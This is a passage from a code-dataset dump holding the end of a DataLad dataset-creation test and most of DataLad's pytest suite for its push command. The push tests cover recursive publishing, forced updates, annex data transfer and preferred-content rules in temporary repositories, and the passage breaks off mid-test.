'subds_lvl1_clean'),\n result_xfm=None, return_type='list'))\n\n\n@with_tempfile(mkdir=True)\ndef check_create_initopts_form(form, path=None):\n path = Path(path)\n\n template_dir = path / \"templates\"\n template_dir.mkdir()\n (template_dir / \"foo\").write_text(\"\")\n\n forms = {\"list\": [f\"--template={template_dir}\"],\n \"dict\": {\"template\": str(template_dir)}}\n\n ds = Dataset(path / \"ds\")\n ds.create(initopts=forms[form])\n ok_exists(ds.repo.dot_git / \"foo\")\n\n\[email protected](\"form\", [\"dict\", \"list\"])\ndef test_create_initopts_form(form):\n check_create_initopts_form(form)\n\n\n@with_tempfile\ndef test_bad_cfg_proc(path=None):\n ds = Dataset(path)\n # check if error is raised for incorrect cfg_proc\n assert_raises(ValueError, ds.create, path=path, cfg_proc='unknown')\n # verify that no directory got created prior to the error\n assert not op.isdir(path)\n" }, { "alpha_fraction": 0.6220980286598206, "alphanum_fraction": 0.6277368664741516, "avg_line_length": 38.135189056396484, "blob_id": "678b48b91592f013fd2e3b3daf7aaf88f64a5c9f", "content_id": "690d9b35b7dc8aa0a829be06f87b08b22f177888", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 39370, "license_type": "permissive", "max_line_length": 146, "num_lines": 1006, "path": "/datalad/core/distributed/tests/test_push.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test push\n\n\"\"\"\n\nimport logging\nimport os\n\nimport pytest\n\nfrom datalad.core.distributed.clone import Clone\nfrom datalad.core.distributed.push import Push\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.exceptions import (\n IncompleteResultsError,\n InsufficientArgumentsError,\n)\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.support.network import get_local_file_url\nfrom datalad.tests.utils_pytest import (\n DEFAULT_BRANCH,\n DEFAULT_REMOTE,\n SkipTest,\n assert_false,\n assert_in,\n assert_in_results,\n assert_not_in,\n assert_not_in_results,\n assert_raises,\n assert_repo_status,\n assert_result_count,\n assert_status,\n eq_,\n known_failure_githubci_osx,\n known_failure_githubci_win,\n neq_,\n ok_,\n ok_file_has_content,\n serve_path_via_http,\n skip_if_adjusted_branch,\n skip_if_on_windows,\n skip_ssh,\n slow,\n swallow_logs,\n with_tempfile,\n with_tree,\n)\nfrom datalad.utils import (\n Path,\n chpwd,\n path_startswith,\n swallow_outputs,\n)\n\nDEFAULT_REFSPEC = \"refs/heads/{0}:refs/heads/{0}\".format(DEFAULT_BRANCH)\n\nckwa = dict(\n result_renderer='disabled',\n)\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_invalid_call(origin=None, tdir=None):\n ds = Dataset(origin).create()\n # no target\n assert_status('impossible', ds.push(on_failure='ignore'))\n # no dataset\n with chpwd(tdir):\n assert_raises(InsufficientArgumentsError, Push.__call__)\n # dataset, but outside path\n assert_raises(IncompleteResultsError, ds.push, path=tdir)\n # given a path constraint that doesn't match anything, will cause\n # nothing to be done\n assert_status('notneeded', ds.push(path=ds.pathobj / 'nothere'))\n\n # unavailable subdataset\n dummy_sub = ds.create('sub')\n dummy_sub.drop(what='all', reckless='kill', recursive=True)\n assert_in('sub', ds.subdatasets(state='absent', result_xfm='relpaths'))\n # now an explicit call to publish the unavailable subdataset\n assert_raises(ValueError, ds.push, 'sub')\n\n target = mk_push_target(ds, 'target', tdir, annex=True)\n # revision that doesn't exist\n assert_raises(\n ValueError,\n ds.push, to='target', since='09320957509720437523')\n\n # If a publish() user accidentally passes since='', which push() spells as\n # since='^', the call is aborted.\n assert_raises(\n ValueError,\n ds.push, to='target', since='')\n\n\ndef mk_push_target(ds, name, path, annex=True, bare=True):\n # life could be simple, but nothing is simple on windows\n #src.create_sibling(dst_path, name='target')\n if annex:\n if bare:\n target = GitRepo(path=path, bare=True, create=True)\n # cannot use call_annex()\n target.call_git(['annex', 'init'])\n else:\n target = AnnexRepo(path, init=True, create=True)\n if not target.is_managed_branch():\n # for managed branches we need more fireworks->below\n target.config.set(\n 'receive.denyCurrentBranch', 'updateInstead',\n scope='local')\n else:\n target = GitRepo(path=path, bare=bare, create=True)\n ds.siblings('add', name=name, url=path, result_renderer='disabled')\n if annex and not bare and target.is_managed_branch():\n # maximum complication\n # the target repo already has a commit that is unrelated\n # to the source repo, because it has built a reference\n # commit for the managed branch.\n # the only sane approach is to let git-annex establish a shared\n # history\n if AnnexRepo.git_annex_version > \"8.20210631\":\n ds.repo.call_annex(['sync', '--allow-unrelated-histories'])\n else:\n ds.repo.call_annex(['sync'])\n ds.repo.call_annex(['sync', '--cleanup'])\n return target\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef check_push(annex, src_path, dst_path):\n # prepare src\n src = Dataset(src_path).create(annex=annex)\n src_repo = src.repo\n # push should not add branches to the local dataset\n orig_branches = src_repo.get_branches()\n assert_not_in('synced/' + DEFAULT_BRANCH, orig_branches)\n\n res = src.push(on_failure='ignore')\n assert_result_count(res, 1)\n assert_in_results(\n res, status='impossible',\n message='No push target given, and none could be auto-detected, '\n 'please specify via --to')\n eq_(orig_branches, src_repo.get_branches())\n # target sibling\n target = mk_push_target(src, 'target', dst_path, annex=annex)\n eq_(orig_branches, src_repo.get_branches())\n\n res = src.push(to=\"target\")\n eq_(orig_branches, src_repo.get_branches())\n assert_result_count(res, 2 if annex else 1)\n assert_in_results(\n res,\n action='publish', status='ok', target='target',\n refspec=DEFAULT_REFSPEC,\n operations=['new-branch'])\n\n assert_repo_status(src_repo, annex=annex)\n eq_(list(target.get_branch_commits_(DEFAULT_BRANCH)),\n list(src_repo.get_branch_commits_(DEFAULT_BRANCH)))\n\n # configure a default merge/upstream target\n src.config.set('branch.{}.remote'.format(DEFAULT_BRANCH),\n 'target', scope='local')\n src.config.set('branch.{}.merge'.format(DEFAULT_BRANCH),\n DEFAULT_BRANCH, scope='local')\n\n # don't fail when doing it again, no explicit target specification\n # needed anymore\n res = src.push()\n eq_(orig_branches, src_repo.get_branches())\n # and nothing is pushed\n assert_status('notneeded', res)\n\n assert_repo_status(src_repo, annex=annex)\n eq_(list(target.get_branch_commits_(DEFAULT_BRANCH)),\n list(src_repo.get_branch_commits_(DEFAULT_BRANCH)))\n\n # some modification:\n (src.pathobj / 'test_mod_file').write_text(\"Some additional stuff.\")\n src.save(to_git=True, message=\"Modified.\")\n (src.pathobj / 'test_mod_annex_file').write_text(\"Heavy stuff.\")\n src.save(to_git=not annex, message=\"Modified again.\")\n assert_repo_status(src_repo, annex=annex)\n\n # we could say since='HEAD~2' to make things fast, or we are lazy\n # and say since='^' to indicate the state of the tracking remote\n # which is the same, because we made to commits since the last push.\n res = src.push(to='target', since=\"^\", jobs=2)\n assert_in_results(\n res,\n action='publish', status='ok', target='target',\n refspec=DEFAULT_REFSPEC,\n # we get to see what happened\n operations=['fast-forward'])\n if annex:\n # we got to see the copy result for the annexed files\n assert_in_results(\n res,\n action='copy',\n status='ok',\n path=str(src.pathobj / 'test_mod_annex_file'))\n # we published, so we can drop and reobtain\n ok_(src_repo.file_has_content('test_mod_annex_file'))\n src_repo.drop('test_mod_annex_file')\n ok_(not src_repo.file_has_content('test_mod_annex_file'))\n src_repo.get('test_mod_annex_file')\n ok_(src_repo.file_has_content('test_mod_annex_file'))\n ok_file_has_content(\n src_repo.pathobj / 'test_mod_annex_file',\n 'Heavy stuff.')\n\n eq_(list(target.get_branch_commits_(DEFAULT_BRANCH)),\n list(src_repo.get_branch_commits_(DEFAULT_BRANCH)))\n if not (annex and src_repo.is_managed_branch()):\n # the following doesn't make sense in managed branches, because\n # a commit that could be amended is no longer the last commit\n # of a branch after a sync has happened (which did happen\n # during the last push above\n\n # amend and change commit msg in order to test for force push:\n src_repo.commit(\"amended\", options=['--amend'])\n # push should be rejected (non-fast-forward):\n res = src.push(to='target', since='HEAD~2', on_failure='ignore')\n # fails before even touching the annex branch\n assert_in_results(\n res,\n action='publish', status='error', target='target',\n refspec=DEFAULT_REFSPEC,\n operations=['rejected', 'error'])\n # push with force=True works:\n res = src.push(to='target', since='HEAD~2', force='gitpush')\n assert_in_results(\n res,\n action='publish', status='ok', target='target',\n refspec=DEFAULT_REFSPEC,\n operations=['forced-update'])\n eq_(list(target.get_branch_commits_(DEFAULT_BRANCH)),\n list(src_repo.get_branch_commits_(DEFAULT_BRANCH)))\n\n # we do not have more branches than we had in the beginning\n # in particular no 'synced/<default branch>'\n eq_(orig_branches, src_repo.get_branches())\n\n\[email protected](\"annex\", [False, True])\ndef test_push(annex):\n check_push(annex)\n\n\ndef check_datasets_order(res, order='bottom-up'):\n \"\"\"Check that all type=dataset records not violating the expected order\n\n it is somewhat weak test, i.e. records could be produced so we\n do not detect that order is violated, e.g. a/b c/d would satisfy\n either although they might be neither depth nor breadth wise. But\n this test would allow to catch obvious violations like a, a/b, a\n \"\"\"\n prev = None\n for r in res:\n if r.get('type') != 'dataset':\n continue\n if prev and r['path'] != prev:\n if order == 'bottom-up':\n assert_false(path_startswith(r['path'], prev))\n elif order == 'top-down':\n assert_false(path_startswith(prev, r['path']))\n else:\n raise ValueError(order)\n prev = r['path']\n\n\n@slow # 33sec on Yarik's laptop\n@with_tempfile\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True, suffix='sub')\n@with_tempfile(mkdir=True, suffix='subnoannex')\n@with_tempfile(mkdir=True, suffix='subsub')\ndef test_push_recursive(\n origin_path=None, src_path=None, dst_top=None, dst_sub=None, dst_subnoannex=None, dst_subsub=None):\n # dataset with two submodules and one subsubmodule\n origin = Dataset(origin_path).create()\n origin_subm1 = origin.create('sub m')\n origin_subm1.create('subsub m')\n origin.create('subm noannex', annex=False)\n origin.save()\n assert_repo_status(origin.path)\n # prepare src as a fresh clone with all subdatasets checkout out recursively\n # running on a clone should make the test scenario more different than\n # test_push(), even for the pieces that should be identical\n top = Clone.__call__(source=origin.path, path=src_path)\n subs = top.get('.', recursive=True, get_data=False, result_xfm='datasets')\n # order for '.' should not be relied upon, so sort by path\n sub, subsub, subnoannex = sorted(subs, key=lambda ds: ds.path)\n\n target_top = mk_push_target(top, 'target', dst_top, annex=True)\n # subdatasets have no remote yet, so recursive publishing should fail:\n res = top.push(to=\"target\", recursive=True, on_failure='ignore')\n check_datasets_order(res)\n assert_in_results(\n res, path=top.path, type='dataset',\n refspec=DEFAULT_REFSPEC,\n operations=['new-branch'], action='publish', status='ok',\n target='target')\n for d in (sub, subsub, subnoannex):\n assert_in_results(\n res, status='error', type='dataset', path=d.path,\n message=(\"Unknown target sibling '%s'.\",\n 'target'))\n # now fix that and set up targets for the submodules\n target_sub = mk_push_target(sub, 'target', dst_sub, annex=True)\n target_subnoannex = mk_push_target(\n subnoannex, 'target', dst_subnoannex, annex=False)\n target_subsub = mk_push_target(subsub, 'target', dst_subsub, annex=True)\n\n # and same push call as above\n res = top.push(to=\"target\", recursive=True)\n check_datasets_order(res)\n # topds skipped\n assert_in_results(\n res, path=top.path, type='dataset',\n action='publish', status='notneeded', target='target')\n # the rest pushed\n for d in (sub, subsub, subnoannex):\n assert_in_results(\n res, status='ok', type='dataset', path=d.path,\n refspec=DEFAULT_REFSPEC)\n # all corresponding branches match across all datasets\n for s, d in zip((top, sub, subnoannex, subsub),\n (target_top, target_sub, target_subnoannex,\n target_subsub)):\n eq_(list(s.repo.get_branch_commits_(DEFAULT_BRANCH)),\n list(d.get_branch_commits_(DEFAULT_BRANCH)))\n if s != subnoannex:\n eq_(list(s.repo.get_branch_commits_(\"git-annex\")),\n list(d.get_branch_commits_(\"git-annex\")))\n\n # rerun should not result in further pushes of the default branch\n res = top.push(to=\"target\", recursive=True)\n check_datasets_order(res)\n assert_not_in_results(\n res, status='ok', refspec=DEFAULT_REFSPEC)\n assert_in_results(\n res, status='notneeded', refspec=DEFAULT_REFSPEC)\n\n # now annex a file in subsub\n test_copy_file = subsub.pathobj / 'test_mod_annex_file'\n test_copy_file.write_text(\"Heavy stuff.\")\n # save all the way up\n assert_status(\n ('ok', 'notneeded'),\n top.save(message='subsub got something', recursive=True))\n assert_repo_status(top.path)\n # publish straight up, should be smart by default\n res = top.push(to=\"target\", recursive=True)\n check_datasets_order(res)\n # we see 3 out of 4 datasets pushed (sub noannex was left unchanged)\n for d in (top, sub, subsub):\n assert_in_results(\n res, status='ok', type='dataset', path=d.path,\n refspec=DEFAULT_REFSPEC)\n # file content copied too\n assert_in_results(\n res,\n action='copy',\n status='ok',\n path=str(test_copy_file))\n # verify it is accessible, drop and bring back\n assert_status('ok', top.drop(str(test_copy_file)))\n ok_(not subsub.repo.file_has_content('test_mod_annex_file'))\n top.get(test_copy_file)\n ok_file_has_content(test_copy_file, 'Heavy stuff.')\n\n # make two modification\n (sub.pathobj / 'test_mod_annex_file').write_text('annex')\n (subnoannex.pathobj / 'test_mod_file').write_text('git')\n # save separately\n top.save(sub.pathobj, message='annexadd', recursive=True)\n top.save(subnoannex.pathobj, message='gitadd', recursive=True)\n # now only publish the latter one\n res = top.push(to=\"target\", since=DEFAULT_BRANCH + '~1', recursive=True)\n # nothing copied, no reports on the other modification\n assert_not_in_results(res, action='copy')\n assert_not_in_results(res, path=sub.path)\n for d in (top, subnoannex):\n assert_in_results(\n res, status='ok', type='dataset', path=d.path,\n refspec=DEFAULT_REFSPEC)\n # an unconditional push should now pick up the remaining changes\n res = top.push(to=\"target\", recursive=True)\n assert_in_results(\n res,\n action='copy',\n status='ok',\n path=str(sub.pathobj / 'test_mod_annex_file'))\n assert_in_results(\n res, status='ok', type='dataset', path=sub.path,\n refspec=DEFAULT_REFSPEC)\n for d in (top, subnoannex, subsub):\n assert_in_results(\n res, status='notneeded', type='dataset', path=d.path,\n refspec=DEFAULT_REFSPEC)\n\n # if noannex target gets some annex, we still should not fail to push\n target_subnoannex.call_git(['annex', 'init'])\n # just to ensure that we do need something to push\n (subnoannex.pathobj / \"newfile\").write_text(\"content\")\n subnoannex.save()\n res = subnoannex.push(to=\"target\")\n assert_in_results(res, status='ok', type='dataset')\n\n\n@slow # 12sec on Yarik's laptop\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_push_subds_no_recursion(src_path=None, dst_top=None, dst_sub=None, dst_subsub=None):\n # dataset with one submodule and one subsubmodule\n top = Dataset(src_path).create()\n sub = top.create('sub m')\n test_file = sub.pathobj / 'subdir' / 'test_file'\n test_file.parent.mkdir()\n test_file.write_text('some')\n subsub = sub.create(sub.pathobj / 'subdir' / 'subsub m')\n top.save(recursive=True)\n assert_repo_status(top.path)\n target_top = mk_push_target(top, 'target', dst_top, annex=True)\n target_sub = mk_push_target(sub, 'target', dst_sub, annex=True)\n target_subsub = mk_push_target(subsub, 'target', dst_subsub, annex=True)\n # now publish, but NO recursion, instead give the parent dir of\n # both a subdataset and a file in the middle subdataset\n res = top.push(\n to='target',\n # give relative to top dataset to elevate the difficulty a little\n path=str(test_file.relative_to(top.pathobj).parent))\n assert_status('ok', res)\n assert_in_results(res, action='publish', type='dataset', path=top.path)\n assert_in_results(res, action='publish', type='dataset', path=sub.path)\n assert_in_results(res, action='copy', type='file', path=str(test_file))\n # the lowest-level subdataset isn't touched\n assert_not_in_results(\n res, action='publish', type='dataset', path=subsub.path)\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_force_checkdatapresent(srcpath=None, dstpath=None):\n src = Dataset(srcpath).create()\n target = mk_push_target(src, 'target', dstpath, annex=True, bare=True)\n (src.pathobj / 'test_mod_annex_file').write_text(\"Heavy stuff.\")\n src.save(to_git=False, message=\"New annex file\")\n assert_repo_status(src.path, annex=True)\n whereis_prior = src.repo.whereis(files=['test_mod_annex_file'])[0]\n\n res = src.push(to='target', data='nothing')\n # nothing reported to be copied\n assert_not_in_results(res, action='copy')\n # we got the git-push nevertheless\n eq_(src.repo.get_hexsha(DEFAULT_BRANCH), target.get_hexsha(DEFAULT_BRANCH))\n # nothing moved\n eq_(whereis_prior, src.repo.whereis(files=['test_mod_annex_file'])[0])\n\n # now a push without forced no-transfer\n # we do not give since, so the non-transfered file is picked up\n # and transferred\n res = src.push(to='target', force=None)\n # no branch change, done before\n assert_in_results(res, action='publish', status='notneeded',\n refspec=DEFAULT_REFSPEC)\n # but availability update\n assert_in_results(res, action='publish', status='ok',\n refspec='refs/heads/git-annex:refs/heads/git-annex')\n assert_in_results(res, status='ok',\n path=str(src.pathobj / 'test_mod_annex_file'),\n action='copy')\n # whereis info reflects the change\n ok_(len(whereis_prior) < len(\n src.repo.whereis(files=['test_mod_annex_file'])[0]))\n\n # do it yet again will do nothing, because all is up-to-date\n assert_status('notneeded', src.push(to='target', force=None))\n # an explicit reference point doesn't change that\n assert_status('notneeded',\n src.push(to='target', force=None, since='HEAD~1'))\n\n # now force data transfer\n res = src.push(to='target', force='checkdatapresent')\n # no branch change, done before\n assert_in_results(res, action='publish', status='notneeded',\n refspec=DEFAULT_REFSPEC)\n # no availability update\n assert_in_results(res, action='publish', status='notneeded',\n refspec='refs/heads/git-annex:refs/heads/git-annex')\n # but data transfer\n assert_in_results(res, status='ok',\n path=str(src.pathobj / 'test_mod_annex_file'),\n action='copy')\n\n # force data transfer, but data isn't available\n src.repo.drop('test_mod_annex_file')\n res = src.push(to='target', path='.', force='checkdatapresent', on_failure='ignore')\n assert_in_results(res, status='impossible',\n path=str(src.pathobj / 'test_mod_annex_file'),\n action='copy',\n message='Slated for transport, but no content present')\n\n\n@known_failure_githubci_win # recent git-annex, https://github.com/datalad/datalad/issues/7185\n@with_tempfile(mkdir=True)\n@with_tree(tree={'ria-layout-version': '1\\n'})\ndef test_ria_push(srcpath=None, dstpath=None):\n # complex test involving a git remote, a special remote, and a\n # publication dependency\n src = Dataset(srcpath).create()\n testfile = src.pathobj / 'test_mod_annex_file'\n testfile.write_text(\"Heavy stuff.\")\n src.save()\n assert_status(\n 'ok',\n src.create_sibling_ria(\n \"ria+{}\".format(get_local_file_url(dstpath, compatibility='git')),\n \"datastore\", new_store_ok=True))\n res = src.push(to='datastore')\n assert_in_results(\n res, action='publish', target='datastore', status='ok',\n refspec=DEFAULT_REFSPEC)\n assert_in_results(\n res, action='publish', target='datastore', status='ok',\n refspec='refs/heads/git-annex:refs/heads/git-annex')\n assert_in_results(\n res, action='copy', target='datastore-storage', status='ok',\n path=str(testfile))\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_gh1426(origin_path=None, target_path=None):\n # set up a pair of repos, one the published copy of the other\n origin = Dataset(origin_path).create()\n target = mk_push_target(\n origin, 'target', target_path, annex=True, bare=False)\n origin.push(to='target')\n assert_repo_status(origin.path)\n assert_repo_status(target.path)\n eq_(origin.repo.get_hexsha(DEFAULT_BRANCH),\n target.get_hexsha(DEFAULT_BRANCH))\n\n # gist of #1426 is that a newly added subdataset does not cause the\n # superdataset to get published\n origin.create('sub')\n assert_repo_status(origin.path)\n neq_(origin.repo.get_hexsha(DEFAULT_BRANCH),\n target.get_hexsha(DEFAULT_BRANCH))\n # now push\n res = origin.push(to='target')\n assert_result_count(\n res, 1, status='ok', type='dataset', path=origin.path,\n action='publish', target='target', operations=['fast-forward'])\n eq_(origin.repo.get_hexsha(DEFAULT_BRANCH),\n target.get_hexsha(DEFAULT_BRANCH))\n\n\n@skip_if_adjusted_branch # gh-4075\n@skip_if_on_windows # create_sibling incompatible with win servers\n@skip_ssh\n@with_tree(tree={'1': '123'})\n@with_tempfile(mkdir=True)\n@serve_path_via_http\ndef test_publish_target_url(src=None, desttop=None, desturl=None):\n # https://github.com/datalad/datalad/issues/1762\n ds = Dataset(src).create(force=True)\n ds.save('1')\n ds.create_sibling('ssh://datalad-test:%s/subdir' % desttop,\n name='target',\n target_url=desturl + 'subdir/.git')\n results = ds.push(to='target')\n assert results\n ok_file_has_content(Path(desttop, 'subdir', '1'), '123')\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile()\n@with_tempfile()\n@with_tempfile()\ndef test_gh1763(src=None, target1=None, target2=None, target3=None):\n # this test is very similar to test_publish_depends, but more\n # comprehensible, and directly tests issue 1763\n src = Dataset(src).create(force=True, **ckwa)\n targets = [\n mk_push_target(src, f'target{i}', t, bare=False)\n for i, t in enumerate([target1, target2, target3])\n ]\n src.siblings('configure', name='target0',\n publish_depends=['target1', 'target2'],\n **ckwa)\n # a file to annex\n (src.pathobj / 'probe1').write_text('probe1')\n src.save('probe1', to_git=False, **ckwa)\n # make sure the probe is annexed, not straight in Git\n assert_in('probe1', src.repo.get_annexed_files(with_content_only=True))\n # publish to target0, must handle dependency\n src.push(to='target0', **ckwa)\n for target in targets:\n # with a managed branch we are pushing into the corresponding branch\n # and do not see a change in the worktree\n if not target.is_managed_branch():\n # direct test for what is in the checkout\n assert_in(\n 'probe1',\n target.get_annexed_files(with_content_only=True))\n # ensure git-annex knows this target has the file\n assert_in(target.config.get('annex.uuid'),\n src.repo.whereis(['probe1'])[0])\n\n\n@with_tempfile()\n@with_tempfile()\ndef test_gh1811(srcpath=None, clonepath=None):\n orig = Dataset(srcpath).create()\n (orig.pathobj / 'some').write_text('some')\n orig.save()\n clone = Clone.__call__(source=orig.path, path=clonepath)\n (clone.pathobj / 'somemore').write_text('somemore')\n clone.save()\n clone.repo.call_git(['checkout', 'HEAD~1'])\n res = clone.push(to=DEFAULT_REMOTE, on_failure='ignore')\n assert_result_count(res, 1)\n assert_result_count(\n res, 1,\n path=clone.path, type='dataset', action='publish',\n status='impossible',\n message='There is no active branch, cannot determine remote '\n 'branch',\n )\n\n\n# FIXME: on crippled FS post-update hook enabling via create-sibling doesn't\n# work ATM\n@skip_if_adjusted_branch\n@with_tempfile()\n@with_tempfile()\ndef test_push_wanted(srcpath=None, dstpath=None):\n src = Dataset(srcpath).create()\n (src.pathobj / 'data.0').write_text('0')\n (src.pathobj / 'secure.1').write_text('1')\n (src.pathobj / 'secure.2').write_text('2')\n src.save()\n\n # Dropping a file to mimic a case of simply not having it locally (thus not\n # to be \"pushed\")\n src.drop('secure.2', reckless='kill')\n\n # Annotate sensitive content, actual value \"verysecure\" does not matter in\n # this example\n src.repo.set_metadata(\n add={'distribution-restrictions': 'verysecure'},\n files=['secure.1', 'secure.2'])\n\n src.create_sibling(\n dstpath,\n annex_wanted=\"not metadata=distribution-restrictions=*\",\n name='target',\n )\n # check that wanted is obeyed, since set in sibling configuration\n res = src.push(to='target')\n assert_in_results(\n res, action='copy', path=str(src.pathobj / 'data.0'), status='ok')\n for p in ('secure.1', 'secure.2'):\n assert_not_in_results(res, path=str(src.pathobj / p))\n assert_status('notneeded', src.push(to='target'))\n\n # check the target to really make sure\n dst = Dataset(dstpath)\n # normal file, yes\n eq_((dst.pathobj / 'data.0').read_text(), '0')\n # secure file, no\n if dst.repo.is_managed_branch():\n neq_((dst.pathobj / 'secure.1').read_text(), '1')\n else:\n assert_raises(FileNotFoundError, (dst.pathobj / 'secure.1').read_text)\n\n # reset wanted config, which must enable push of secure file\n src.repo.set_preferred_content('wanted', '', remote='target')\n res = src.push(to='target')\n assert_in_results(res, path=str(src.pathobj / 'secure.1'))\n eq_((dst.pathobj / 'secure.1').read_text(), '1')\n\n\n# FIXME: on crippled FS post-update hook enabling via create-sibling doesn't\n# work ATM\n@skip_if_adjusted_branch\n@slow # 10sec on Yarik's laptop\n@with_tempfile(mkdir=True)\ndef test_auto_data_transfer(path=None):\n path = Path(path)\n ds_a = Dataset(path / \"a\").create()\n (ds_a.pathobj / \"foo.dat\").write_text(\"foo\")\n ds_a.save()\n\n # Should be the default, but just in case.\n ds_a.repo.config.set(\"annex.numcopies\", \"1\", scope=\"local\")\n ds_a.create_sibling(str(path / \"b\"), name=\"b\")\n\n # With numcopies=1, no data is copied with data=\"auto\".\n res = ds_a.push(to=\"b\", data=\"auto\", since=None)\n assert_not_in_results(res, action=\"copy\")\n\n # Even when a file is explicitly given.\n res = ds_a.push(to=\"b\", path=\"foo.dat\", data=\"auto\", since=None)\n assert_not_in_results(res, action=\"copy\")\n\n # numcopies=2 changes that.\n ds_a.repo.config.set(\"annex.numcopies\", \"2\", scope=\"local\")\n res = ds_a.push(to=\"b\", data=\"auto\", since=None)\n assert_in_results(\n res, action=\"copy\", target=\"b\", status=\"ok\",\n path=str(ds_a.pathobj / \"foo.dat\"))\n\n # --since= limits the files considered by --auto.\n (ds_a.pathobj / \"bar.dat\").write_text(\"bar\")\n ds_a.save()\n (ds_a.pathobj / \"baz.dat\").write_text(\"baz\")\n ds_a.save()\n res = ds_a.push(to=\"b\", data=\"auto\", since=\"HEAD~1\")\n assert_not_in_results(\n res,\n action=\"copy\", path=str(ds_a.pathobj / \"bar.dat\"))\n assert_in_results(\n res,\n action=\"copy\", target=\"b\", status=\"ok\",\n path=str(ds_a.pathobj / \"baz.dat\"))\n\n # --auto also considers preferred content.\n ds_a.repo.config.unset(\"annex.numcopies\", scope=\"local\")\n ds_a.repo.set_preferred_content(\"wanted\", \"nothing\", remote=\"b\")\n res = ds_a.push(to=\"b\", data=\"auto\", since=None)\n assert_not_in_results(\n res,\n action=\"copy\", path=str(ds_a.pathobj / \"bar.dat\"))\n\n ds_a.repo.set_preferred_content(\"wanted\", \"anything\", remote=\"b\")\n res = ds_a.push(to=\"b\", data=\"auto\", since=None)\n assert_in_results(\n res,\n action=\"copy\", target=\"b\", status=\"ok\",\n path=str(ds_a.pathobj / \"bar.dat\"))\n\n\n# FIXME: on crippled FS post-update hook enabling via create-sibling doesn't\n# work ATM\n@skip_if_adjusted_branch\n@slow # 16sec on Yarik's laptop\n@with_tempfile(mkdir=True)\ndef test_auto_if_wanted_data_transfer_path_restriction(path=None):\n path = Path(path)\n ds_a = Dataset(path / \"a\").create()\n ds_a_sub0 = ds_a.create(\"sub0\")\n ds_a_sub1 = ds_a.create(\"sub1\")\n\n for ds in [ds_a, ds_a_sub0, ds_a_sub1]:\n (ds.pathobj / \"sec.dat\").write_text(\"sec\")\n (ds.pathobj / \"reg.dat\").write_text(\"reg\")\n ds_a.save(recursive=True)\n\n ds_a.create_sibling(str(path / \"b\"), name=\"b\",\n annex_wanted=\"not metadata=distribution-restrictions=*\",\n recursive=True)\n for ds in [ds_a, ds_a_sub0, ds_a_sub1]:\n ds.repo.set_metadata(add={\"distribution-restrictions\": \"doesntmatter\"},\n files=[\"sec.dat\"])\n\n # wanted-triggered --auto can be restricted to subdataset...\n res = ds_a.push(to=\"b\", path=\"sub0\", data=\"auto-if-wanted\",\n recursive=True)\n assert_not_in_results(\n res,\n action=\"copy\", target=\"b\", status=\"ok\",\n path=str(ds_a.pathobj / \"reg.dat\"))\n assert_in_results(\n res,\n action=\"copy\", target=\"b\", status=\"ok\",\n path=str(ds_a_sub0.pathobj / \"reg.dat\"))\n assert_not_in_results(\n res,\n action=\"copy\", target=\"b\", status=\"ok\",\n path=str(ds_a_sub0.pathobj / \"sec.dat\"))\n assert_not_in_results(\n res,\n action=\"copy\", target=\"b\", status=\"ok\",\n path=str(ds_a_sub1.pathobj / \"reg.dat\"))\n\n # ... and to a wanted file.\n res = ds_a.push(to=\"b\", path=\"reg.dat\", data=\"auto-if-wanted\",\n recursive=True)\n assert_in_results(\n res,\n action=\"copy\", target=\"b\", status=\"ok\",\n path=str(ds_a.pathobj / \"reg.dat\"))\n assert_not_in_results(\n res,\n action=\"copy\", target=\"b\", status=\"ok\",\n path=str(ds_a_sub1.pathobj / \"reg.dat\"))\n\n # But asking to transfer a file does not do it if the remote has a\n # wanted setting and doesn't want it.\n res = ds_a.push(to=\"b\", path=\"sec.dat\", data=\"auto-if-wanted\",\n recursive=True)\n assert_not_in_results(\n res,\n action=\"copy\", target=\"b\", status=\"ok\",\n path=str(ds_a.pathobj / \"sec.dat\"))\n\n res = ds_a.push(to=\"b\", path=\"sec.dat\", data=\"anything\", recursive=True)\n assert_in_results(\n res,\n action=\"copy\", target=\"b\", status=\"ok\",\n path=str(ds_a.pathobj / \"sec.dat\"))\n\n\n@with_tempfile(mkdir=True)\ndef test_push_git_annex_branch_when_no_data(path=None):\n path = Path(path)\n ds = Dataset(path / \"a\").create()\n target = mk_push_target(ds, \"target\", str(path / \"target\"),\n annex=False, bare=True)\n (ds.pathobj / \"f0\").write_text(\"0\")\n ds.save()\n ds.push(to=\"target\", data=\"nothing\")\n assert_in(\"git-annex\",\n {d[\"refname:strip=2\"]\n for d in target.for_each_ref_(fields=\"refname:strip=2\")})\n\n\n@known_failure_githubci_osx\n@with_tree(tree={\"ds\": {\"f0\": \"0\", \"f1\": \"0\", \"f2\": \"0\",\n \"f3\": \"1\",\n \"f4\": \"2\", \"f5\": \"2\"}})\ndef test_push_git_annex_branch_many_paths_same_data(path=None):\n path = Path(path)\n ds = Dataset(path / \"ds\").create(force=True)\n ds.save()\n mk_push_target(ds, \"target\", str(path / \"target\"),\n annex=True, bare=False)\n nbytes = sum(ds.repo.get_content_annexinfo(paths=[f])[f][\"bytesize\"]\n for f in [ds.repo.pathobj / \"f0\",\n ds.repo.pathobj / \"f3\",\n ds.repo.pathobj / \"f4\"])\n with swallow_logs(new_level=logging.DEBUG) as cml:\n res = ds.push(to=\"target\")\n assert_in(\"{} bytes of annex data\".format(nbytes), cml.out)\n # 3 files point to content already covered by another file.\n assert_result_count(res, 